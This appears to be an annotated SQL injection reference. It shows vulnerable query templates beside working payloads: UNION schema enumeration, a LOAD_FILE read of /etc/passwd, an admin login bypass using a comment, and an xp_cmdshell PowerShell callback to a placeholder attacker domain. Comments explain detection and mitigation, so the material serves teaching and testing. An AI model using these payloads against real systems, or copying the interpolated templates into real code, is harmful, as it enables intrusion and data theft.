-
Retrieving schema objects
- Vulnerable query that fetches posts (user input interpolated into the statement text)
-- Vulnerable template: the caller's value is spliced into the statement text as
-- {user_input}, so whatever the user sends is parsed as SQL. The fix is to bind
-- the value (WHERE id = ?) rather than interpolate it; every payload that
-- follows doubles as a regression test for that fix.
SELECT * FROM posts WHERE id = {user_input};
- Benign query (expected input)
-- Benign request (id = 1): returns the single post shown in the result below.
SELECT * FROM posts WHERE id = 1;
{ "id": 1, "title": "First Post", "content": "This is the content of the first post." }
- Manipulated query
-- Schema enumeration via UNION: the appended SELECT supplies three columns to
-- match the posts row (id, title, content) and places table_name in the text
-- column, so the application renders the schema's table names as if they were
-- posts. Note the result column keeps the first SELECT's name, so in a real
-- response the names appear under "title" (as the file-read example below shows).
-- Detection: a numeric-id lookup never legitimately contains UNION or
-- information_schema. Mitigation: parameter binding; a least-privileged
-- application account limits what an enumeration can reach afterwards.
SELECT * FROM posts WHERE id = 1 UNION SELECT null, table_name, null FROM information_schema.tables WHERE table_schema = 'database_name'
[ { "id": 1, "title": "First Post", "content": "This is the content of the first post." }, { "id": null, "table_name": "posts", "content": null }, { "id": null, "table_name": "user_information", "content": null } ]
- Query that fetches posts
-
Reading a file from the database server's file system
- Query that fetches posts
-- Vulnerable template (same as the schema example): the id is interpolated
-- rather than bound, so the UNION below is accepted as part of the statement.
SELECT * FROM posts WHERE id = {user_input};
- Manipulating the query to read local files
-- File read: LOAD_FILE() is MySQL/MariaDB-specific and returns file contents
-- only when the database account holds the FILE privilege and the path is
-- readable by the server process (subject to secure_file_priv). The example
-- therefore also tests account privilege: a least-privileged application
-- account yields NULL in the text column even when the injection itself lands.
-- Mitigation: parameter binding; never grant FILE to the application account.
SELECT * FROM posts WHERE id = 1 UNION SELECT null, LOAD_FILE('/etc/passwd'),null;
[ { "id": 1, "title": "First Post", "content": "This is the content of the first post." }, { "id": null, "title": "root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000:user:/home/user:/bin/bash\n...", "content": null } ]
- Query that fetches posts
- Login bypass
-
Query that validates credentials
-- Vulnerable credential check: both submitted values are interpolated as string
-- literals, and the password is compared inside the query (which implies it is
-- stored in a directly comparable form). Bind both values; better still, select
-- the user by a bound id and verify a salted password hash in application code
-- so the password never appears in a SQL predicate.
SELECT * FROM users WHERE id = '{user_input_id}' AND password = '{user_input_password}';
-
Manipulated query
-- Login bypass: the submitted id closes the string literal and starts a line
-- comment, so everything from "-- AND password" onward is ignored and the admin
-- row is returned regardless of the password supplied.
-- Detection: a quote followed by a comment token inside a credential field.
-- Mitigation: bound parameters make the quote and comment part of the value.
SELECT * FROM users WHERE id = 'admin'-- AND password = '1';
-
- OAST (out-of-band interaction)
- Query that fetches posts
-- Vulnerable template: with the id interpolated rather than bound, a
-- semicolon in the input can append a second statement on engines that
-- execute stacked statements (as the example below relies on).
SELECT * FROM posts WHERE id = {user_input};
- Manipulated query
-- Out-of-band probe: the appended statement only has effect on a SQL Server-style
-- engine that executes stacked statements and has xp_cmdshell enabled; it makes
-- the database host issue an HTTPS request to the tester's listener, which is
-- how a blind injection is confirmed. Note this example assumes a different
-- engine from the MySQL-flavoured examples above.
-- Mitigation: parameter binding; keep xp_cmdshell disabled; run the application
-- account without sysadmin rights; restrict and log outbound traffic from the
-- database host so unexpected callbacks are blocked and visible.
SELECT * FROM posts WHERE id = 1; exec xp_cmdshell('powershell -Command "Invoke-WebRequest -Uri https://[ATTACKER-DOMAIN]/"');
- Query that fetches posts